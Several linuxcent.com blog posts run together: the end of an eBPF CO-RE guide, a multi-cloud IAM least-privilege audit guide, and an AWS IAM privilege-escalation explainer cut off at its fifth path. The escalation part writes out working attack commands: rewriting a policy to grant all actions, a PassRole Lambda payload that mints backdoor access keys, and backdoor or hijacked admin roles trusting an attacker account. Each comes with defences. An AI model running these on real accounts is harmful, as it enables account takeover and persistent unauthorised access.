What you’ll find: Ubuntu 20.04+, Debian 11+, RHEL 8.2+, Amazon Linux 2023, and GKE/EKS managed nodes all have BTF. Amazon Linux 2 and RHEL 7 do not. If you’re running those, CO-RE-based tools fall back to the legacy BCC compilation path — which requires kernel headers installed on the node.

The One Thing to Run Right Now

This command shows you the exact struct layout your running kernel uses — the same layout libbpf reads when it patches CO-RE programs at load time:

# See how your kernel defines task_struct right now
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 30 '^struct task_struct {'

The output is the canonical type information for your running kernel. Every field, every offset. When libbpf loads a CO-RE program, it’s reading this to figure out whether task_struct->comm is at offset 0x620 or 0x624.

You can also see specific struct sizes and verify that two kernels differ:

# On kernel A (5.15.0-89)
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -w "task_struct" | head -3

# On kernel B (5.15.0-91) — same command, different output if struct changed
# This is what broke my tracer: field offset changed across a two-patch jump

The practical use: when a CO-RE eBPF tool fails to load with a BTF error, this is where you look. The error tells you which struct field the relocation failed on. This command shows you the current layout. You can confirm whether the field exists, whether it moved, whether it was renamed.

BCC vs libbpf vs bpftrace

Three approaches to eBPF development, with distinct tradeoffs:

BCC libbpf + CO-RE bpftrace
Compilation Runtime on target host Build-time on dev machine Runtime (embedded LLVM)
Target deployment Compiler + headers on every node Single static binary bpftrace binary only
Portability Compile-on-target handles it CO-RE + BTF handles it Internal CO-RE support
Memory overhead High (Python + compiler: 200MB+) Low (few MB binary) Medium
Startup time Seconds (compilation) Milliseconds Seconds (JIT compile)
Best for Prototyping, development Production tools, shipped software Interactive debugging sessions
Language Python + C C (kernel) + C/Go/Rust (userspace) bpftrace scripting

For anything you’re shipping — an eBPF-based security tool, an observability agent, an open-source project — libbpf + CO-RE is the right choice. BCC is for prototyping before you commit to an implementation. bpftrace is for the 30-second debugging session on a live node.

The practical test: if you’re building something you’ll deploy as a container image or a package, it needs to be a self-contained binary with no build dependencies on the target system. That means libbpf.

Common Mistakes

Mistake Impact Fix
Direct struct dereference instead of BPF_CORE_READ Program breaks on any kernel struct change Use BPF_CORE_READ() for all kernel struct field access
Missing char LICENSE[] SEC("license") = "GPL" GPL-only helpers (most tracing helpers) unavailable Always include the license section
vmlinux.h generated on a very old kernel Missing structs added in newer kernel releases Regenerate from the highest kernel version you target
Forgetting -g flag in clang invocation No BTF debug info → no CO-RE relocations Always compile with -g -O2 -target bpf
Hardcoding struct offsets as integer constants Breaks silently on next kernel patch Use BTF-aware CO-RE macros exclusively

Key Takeaways

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

What’s Next

CO-RE makes eBPF programs portable across kernel versions. EP07 takes the next question: where in the kernel’s data path does it make sense to attach them?

XDP fires before the kernel has allocated a single byte of memory for an incoming packet — before the kernel even knows whether to accept it. That hook placement is why Cilium can do line-rate load balancing and why some network filtering rules that look correct in iptables do nothing against certain traffic. The rules weren’t wrong. The hook was in the wrong place.

Next: XDP — packets processed before the kernel knows they arrived

Get EP07 in your inbox when it publishes → linuxcent.com/subscribe

AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Reading Time: 10 minutes

Meta Description: Run an AWS least privilege audit using Access Analyzer — right-size IAM policies from wildcard permissions to scoped, production-safe roles.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege Audit


TL;DR

  • The average IAM entity uses less than 5% of its granted permissions — the 95% excess is attack surface, not waste
  • AWS Access Analyzer generates a least-privilege policy from 90 days of CloudTrail data — use it on every Lambda role, ECS task role, and EC2 instance profile
  • GCP IAM Recommender surfaces specific right-sizing suggestions based on 90-day activity and tracks them until you act on them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build aws accessanalyzer validate-policy into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

The Big Picture

  THE LEAST PRIVILEGE AUDIT CYCLE

  ┌─────────────────────────────────────────────────────────────────┐
  │  1. INVENTORY  What identities exist, what policies attached?  │
  │  aws iam get-account-authorization-details                      │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  2. CLASSIFY  Group by purpose: human / CI-CD / app / data     │
  │  Expected permission profile per class — deviations are findings│
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  3. FIND UNUSED  Granted vs Used gap (average: 95% excess)     │
  │  AWS: Access Analyzer generated policy + last-accessed data     │
  │  GCP: IAM Recommender  │  Azure: Defender + Access Reviews     │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  4. RIGHT-SIZE  Replace wildcards with scoped permissions       │
  │  Remove unused services · pin resource ARNs · add conditions   │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  5. GUARD  Validate in CI/CD before any policy merges          │
  │  aws accessanalyzer validate-policy → fail pipeline if findings │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  6. MONITOR  Weekly: new findings  Quarterly: full review      │
  │  On offboarding: immediate direct-permission audit             │
  └───────────────────────────┬─────────────────────────────────────┘
                              │
                              └──────────────────── back to 1

The AWS least privilege audit tools covered in this episode map directly onto steps 3–5. The cycle is the practice.


Introduction

An AWS least privilege audit starts by measuring the gap between what each identity is granted and what it actually uses. Then it closes that gap with the tooling AWS, GCP, and Azure all provide natively. The numbers from real environments are consistently worse than teams expect.

Last year I audited an AWS account for an e-commerce company. They’d been running in production for three years. Eight engineers, two teams, a moderately complex microservices architecture. Reasonable people, competent engineers, no obvious security negligence.

When I ran the IAM Access Analyzer policy generation job against their 12 Lambda execution roles and waited for it to pull 90 days of CloudTrail data, here’s what I found:

The average Lambda role had 47 granted permissions. The average Lambda was actually using 6 of them over 90 days. That’s a utilization rate of roughly 13%. The other 87% — the 41 permissions nobody was using — sat there as silent attack surface.

The worst example was a Lambda that processed image thumbnails. Its role had AmazonS3FullAccess plus AmazonDynamoDBFullAccess plus AWSLambdaFullAccess. Someone had attached three AWS managed policies early in development to “make sure everything worked” and never came back to tighten it. The Lambda needed three permissions: s3:GetObject on one bucket, s3:PutObject on another, and logs:CreateLogGroup. That’s it. Instead it had s3:* on all S3, full DynamoDB including delete, and the ability to create and delete other Lambda functions.

If an attacker had exploited a vulnerability in that image processor — a malformed image, a dependency with a CVE — they’d have had full S3 access, full DynamoDB access, and the ability to backdoor other Lambda functions. Not because anyone intended that. Because “make it work first, fix it later” is how IAM configurations drift.

This episode is “fix it later.” The tools exist. The methodology is straightforward. The gap between knowing you should do this and actually doing it is usually not understanding the tooling.


The Fundamental Problem: Granted vs Used

The central insight of IAM auditing is simple: what an identity is granted and what it actually uses are rarely the same thing.

AWS has published data from their own customer environments: the average IAM entity uses less than 5% of the permissions it has been granted. That 95% excess is not wasted. It’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.

The tools to close this gap exist on all three platforms. The difference between organizations that operate at low IAM risk and those that don’t is usually not knowledge. It’s the discipline of actually running these tools regularly and acting on what they find.


AWS IAM Auditing

Last Accessed Data — The Starting Point

AWS tracks when each service was last called by each IAM entity. This tells you which service permissions have never been used:

# Generate last-accessed data for a specific role
aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:role/LambdaImageProcessor

JOB_ID="..." # returned by the above command

# Poll until complete (usually 30-60 seconds)
aws iam get-service-last-accessed-details --job-id "${JOB_ID}"

# Parse: find services that were never called
aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | select(.TotalAuthenticatedEntities == 0) | .ServiceName'
# These services have never been accessed by this role — permissions can be removed

For finer granularity — which specific actions are used within a service:

aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:policy/AppServerPolicy \
  --granularity ACTION_LEVEL

aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | 
    select(.TotalAuthenticatedEntities > 0) |
    {service: .ServiceName, last_used: .LastAuthenticated}'

Access Analyzer — Generated Least-Privilege Policies

This is the tool I use most. It pulls 90 days of CloudTrail data for a role and generates a policy containing only the actions actually called:

# Start a policy generation job
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/LambdaImageProcessor"
  }' \
  --cloudtrail-details '{
    "trailArn": "arn:aws:cloudtrail:ap-south-1:123456789012:trail/management-events",
    "startTime": "2026-01-01T00:00:00Z",
    "endTime": "2026-04-01T00:00:00Z"
  }'

JOB_ID="..."
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

The output is a valid IAM policy document containing only what was called. Compare it against the current policy — the delta is everything that can be removed. I treat the generated policy as a starting point, not a final answer: occasionally a permission is needed but wasn’t exercised in the 90-day window (error handling paths, quarterly jobs, incident response capabilities). Review the generated policy against the function’s known requirements before applying it verbatim.

Access Analyzer also identifies external sharing you may not have intended:

# Find resources shared outside the account or organization
aws accessanalyzer create-analyzer \
  --analyzer-name account-analyzer \
  --type ACCOUNT

aws accessanalyzer list-findings \
  --analyzer-arn arn:aws:accessanalyzer:ap-south-1:123456789012:analyzer/account-analyzer \
  --filter '{"status":{"eq":["ACTIVE"]}}' \
  --output table
# Shows: S3 buckets, KMS keys, Lambda functions accessible from outside the account

And validates new policies before you apply them:

# Run this in CI/CD before any IAM policy gets merged
aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")'

# Exit non-zero if findings exist — fail the pipeline
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')
[ "$FINDINGS" -eq 0 ] || { echo "IAM policy has $FINDINGS security findings"; exit 1; }

CloudTrail for Targeted Investigation

When you need to understand what a specific role has been doing in detail:

# What API calls has LambdaImageProcessor made in the last 30 days?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=LambdaImageProcessor \
  --start-time "$(date -d '30 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output json | jq '.Events[] | {time:.EventTime, event:.EventName, source:.EventSource}'

# All IAM changes in the last 7 days — track who changed what
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventSource,AttributeValue=iam.amazonaws.com \
  --start-time "$(date -d '7 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output table

Open Source Tooling

For a more comprehensive scan across an account:

# Prowler — runs hundreds of checks including IAM-specific ones
pip install prowler
prowler aws --profile default --services iam --output-formats json html

# Key IAM checks:
# iam_root_mfa_enabled
# iam_user_no_setup_initial_access_key
# iam_policy_no_administrative_privileges
# iam_user_access_key_unused → finds keys unused for 90+ days
# iam_role_cross_account_readonlyaccess_policy

# ScoutSuite — multi-cloud auditor with a report UI
pip install scoutsuite
scout aws --profile default --report-dir ./scout-report

GCP IAM Auditing

IAM Recommender — Automated Right-Sizing

GCP’s IAM Recommender analyses 90 days of activity and surfaces specific suggestions: “replace roles/editor with roles/storage.objectViewer.” It tells you exactly what to change, not just that something needs changing:

# List IAM recommendations for a project
gcloud recommender recommendations list \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --format=json | jq '.[] | {
    principal: .description,
    current_role: .content.operationGroups[].operations[] | select(.action=="remove") | .path,
    suggested_role: .content.operationGroups[].operations[] | select(.action=="add") | .value
  }'

# Mark a recommendation as applied (required to track progress)
gcloud recommender recommendations mark-succeeded RECOMMENDATION_ID \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --etag ETAG

In practice, I run IAM Recommender across all GCP projects in a quarterly review. The recommendations don’t age out — GCP continues to track them until you address them or explicitly dismiss them. Dismissed without action counts as a decision; it should be documented.

Policy Analyzer — Answering Access Questions

When you need to understand who has access to a specific resource, and why:

# Who can access a specific BigQuery dataset?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//bigquery.googleapis.com/projects/my-project/datasets/customer_analytics" \
  --output-partial-result-before-timeout

# What can a specific principal do in this project?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//cloudresourcemanager.googleapis.com/projects/my-project" \
  --identity="serviceAccount:[email protected]"

Finding Public Exposure

# Org-wide scan for allUsers or allAuthenticatedUsers bindings
gcloud asset search-all-iam-policies \
  --scope=organizations/ORG_ID \
  --query="policy.members:allUsers OR policy.members:allAuthenticatedUsers" \
  --format=json | jq '.[] | {resource: .resource, policy: .policy}'

Run this in every new environment you inherit. The results reliably surface data exposure incidents waiting to happen — public GCS buckets, publicly readable BigQuery datasets, APIs exposed to any authenticated Google account.


Azure IAM Auditing

Defender for Cloud — Baseline Recommendations

# Get IAM-related security recommendations
az security assessment list --output table | grep -i -E "(identity|mfa|privileged|owner)"

# Check specific conditions:
# "MFA should be enabled on accounts with owner permissions on your subscription"
# "Deprecated accounts should be removed from your subscription"
# "External accounts with owner permissions should be removed from your subscription"

Azure Resource Graph — Bulk Role Assignment Queries

Azure Resource Graph lets you query RBAC assignments across the entire tenant in a single call — essential for large Azure estates:

# All role assignments — who has what, where
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| extend principalId = properties.principalId,
         roleId = properties.roleDefinitionId,
         scope = properties.scope
| project scope, principalId, roleId
| limit 500" \
--output table

# Find all Owner assignments at subscription scope — high-risk
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| where properties.roleDefinitionId endswith '8e3af657-a8ff-443c-a75c-2fe8c4bcb635'
| where properties.scope startswith '/subscriptions/'
| project scope, properties.principalId" \
--output table

Entra ID Access Reviews — Automated Re-Certification

Access reviews send notifications to resource owners or users asking them to confirm that access is still appropriate. When someone doesn’t respond — or responds “no” — the access is removed:

# Create a quarterly access review for subscription Owner assignments
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/identityGovernance/accessReviews/definitions" \
  --body '{
    "displayName": "Quarterly Subscription Owner Review",
    "scope": {
      "query": "/subscriptions/SUB_ID/providers/Microsoft.Authorization/roleAssignments",
      "queryType": "MicrosoftGraph"
    },
    "reviewers": [{"query": "/me", "queryType": "MicrosoftGraph"}],
    "settings": {
      "mailNotificationsEnabled": true,
      "justificationRequiredOnApproval": true,
      "autoApplyDecisionsEnabled": true,
      "defaultDecision": "Deny",          ← if no response, access is removed
      "instanceDurationInDays": 7,
      "recurrence": {
        "pattern": {"type": "absoluteMonthly", "interval": 3},
        "range": {"type": "noEnd"}
      }
    }
  }'

The defaultDecision: Deny setting is the key. Access reviews that default to preserving access on non-response don’t actually remove anything. They just document that nobody reviewed it. Defaulting to revocation means inaction removes access, which is the correct behavior for privileged roles.


The Hardening Workflow

The methodology I apply when auditing any cloud IAM configuration:

Step 1: Inventory Everything

You cannot audit what you don’t know exists.

# AWS: full IAM snapshot in one call
aws iam get-account-authorization-details --output json > iam-snapshot-$(date +%Y%m%d).json
# Contains: all users, groups, roles, policies, attachments — everything

# GCP: export all IAM-relevant assets
gcloud asset export \
  --project=my-project \
  --output-path=gs://audit-bucket/iam-snapshot-$(date +%Y%m%d).json \
  --asset-types="iam.googleapis.com/ServiceAccount,cloudresourcemanager.googleapis.com/Project"

Step 2: Classify by Function

Group identities by purpose: human engineering access, CI/CD pipelines, application workloads, data pipelines, monitoring/audit. Each class has an expected permission profile. Anything outside the expected profile for its class is a finding.

A Lambda function with iam:* is not in the expected profile for application workloads. An EC2 instance role with s3:DeleteObject on * deserves a question. A CI/CD pipeline role with secretsmanager:GetSecretValue warrants understanding what secrets it actually needs.

Step 3: Find Unused Permissions

Apply the tools:
– AWS: Access Analyzer generated policies + Last Accessed Data
– GCP: IAM Recommender
– Azure: Defender for Cloud recommendations + sign-in activity analysis

For any permission unused in 90 days: document whether it’s still needed (rare operation, incident response capability) or can be removed.

Step 4: Right-Size Policies

Replace broad permissions with specific ones:

// Before: attached AmazonS3FullAccess to a read-only service
{
  "Action": "s3:*",
  "Effect": "Allow",
  "Resource": "*"
}

// After: only what the service actually calls
{
  "Action": ["s3:GetObject", "s3:ListBucket"],
  "Effect": "Allow",
  "Resource": [
    "arn:aws:s3:::app-assets-prod",
    "arn:aws:s3:::app-assets-prod/*"
  ]
}

Every wildcard you remove is attack surface eliminated. Not conceptually — concretely.

Step 5: Add Conditions as Guardrails

Conditions constrain how permissions are used even when they can’t be removed:

// Require MFA for sensitive operations — applies across all roles in the account
{
  "Effect": "Deny",
  "Action": ["iam:*", "s3:Delete*", "ec2:Terminate*", "kms:*"],
  "Resource": "*",
  "Condition": {
    "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" }
  }
}

// Restrict all non-service API calls to the corporate network
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "NotIpAddress": { "aws:SourceIp": ["10.0.0.0/8", "172.16.0.0/12"] },
    "Bool": { "aws:ViaAWSService": "false" }   // allow calls made through AWS services (e.g., Lambda calling S3)
  }
}

Step 6: Build It Into CI/CD

IAM configuration changes that aren’t reviewed before they reach production will drift. Make the validation automatic:

# Pre-merge check in CI — catches wildcards and dangerous permissions before they land
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://changed-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')

if [ "$FINDINGS" -gt 0 ]; then
  echo "❌ IAM policy has $FINDINGS security findings — see below"
  aws accessanalyzer validate-policy --policy-document file://changed-policy.json \
    --policy-type IDENTITY_POLICY | jq '.findings[]'
  exit 1
fi

Step 7: Schedule Regular Reviews

IAM audit is not a one-time project. Build a cadence:

  • Weekly: Access Analyzer findings, IAM Recommender dismissals, new cross-account trust relationships
  • Monthly: Unused access keys report, inactive service accounts
  • Quarterly: Access reviews for privileged roles, full policy inventory review
  • On offboarding: Immediate review of departing engineer’s direct permissions and any roles whose trust policies name them

Quick Wins Checklist

Check AWS GCP Azure
No active root / global admin credentials GetAccountSummaryAccountAccessKeysPresent: 0 N/A Check Entra ID conditional access
MFA on all human privileged accounts IAM Credential report Google 2FA enforcement Conditional Access policy
No inactive credentials older than 90 days Credential report LastRotated SA key age Entra ID sign-in activity
No policies with Action:* or Resource:* on write Access Analyzer validate N/A Azure Policy
No public-facing storage S3 Block Public Access constraints/storage.publicAccessPrevention Storage account public access disabled
Machine identities use roles, not static keys Audit for access key creation on roles iam.disableServiceAccountKeyCreation Use Managed Identity
Permissions verified against actual usage Access Analyzer generated policy IAM Recommender Defender for Cloud recommendations

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 6 — Security Assessment and Testing IAM auditing is a core cloud security assessment activity — finding over-permission before attackers do
CISSP Domain 7 — Security Operations Continuous IAM right-sizing is an operational discipline requiring tooling, cadence, and ownership
ISO 27001:2022 5.18 Access rights Periodic review of access rights — this episode is the practical implementation of that control
ISO 27001:2022 8.2 Privileged access rights Reviewing and right-sizing elevated permissions; detecting unused privileged access
ISO 27001:2022 8.16 Monitoring activities Continuous IAM monitoring, CloudTrail analysis, and automated anomaly detection
SOC 2 CC6.3 Access removal processes — Access Analyzer, IAM Recommender, and Access Reviews are the tooling for CC6.3
SOC 2 CC7.1 Threat and vulnerability identification — unused permissions are latent attack surface, identifiable and removable

Key Takeaways

  • The average cloud identity uses less than 5% of its granted permissions — the 95% excess is attack surface, not just waste
  • AWS Access Analyzer generates a least-privilege policy from CloudTrail data — run it on every Lambda role, ECS task role, and EC2 instance profile quarterly
  • GCP IAM Recommender surfaces role right-sizing suggestions based on 90-day activity — they don’t expire until you address them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build IAM policy validation into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

What’s Next

EP10 covers cross-system identity federation — OIDC, SAML, and the trust relationships that let a single IdP authenticate users and workloads across cloud platforms, SaaS applications, and organizational boundaries. Understanding how federation works is also understanding how it can be exploited when trust is too broad.

Next: SAML vs OIDC federation

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Reading Time: 10 minutes

Meta Description: Understand how AWS privilege escalation works through iam:PassRole — learn the attack paths attackers use and the exact policies that block each one.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege Escalation


TL;DR

  • Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
  • iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
  • iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
  • iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
  • Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
  • Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.


Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise — and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a web application firewall, reached the EC2 instance metadata service, retrieved temporary credentials for the instance’s IAM role, and found a role with sts:AssumeRole permissions that let it assume a more powerful role. That more powerful role had access to S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.


The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.


Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters
# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("[email protected]"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"
# Azure: establish context
az account show
az role assignment list --assignee [email protected] --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.


AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json
import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    return {"buckets": [b['Name'] for b in buckets['Buckets']], "key": key}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.

Path 5: SSRF to EC2 Instance Metadata

